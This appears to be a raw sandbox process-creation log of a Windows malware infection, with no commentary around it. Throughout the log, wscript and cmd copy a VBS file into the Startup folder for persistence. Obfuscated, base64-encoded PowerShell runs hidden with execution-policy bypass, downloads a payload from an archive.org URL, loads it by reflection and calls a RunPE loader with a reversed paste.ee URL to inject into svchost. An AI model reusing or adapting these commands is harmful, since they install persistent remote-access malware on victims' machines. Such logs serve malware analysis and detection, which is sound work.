Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
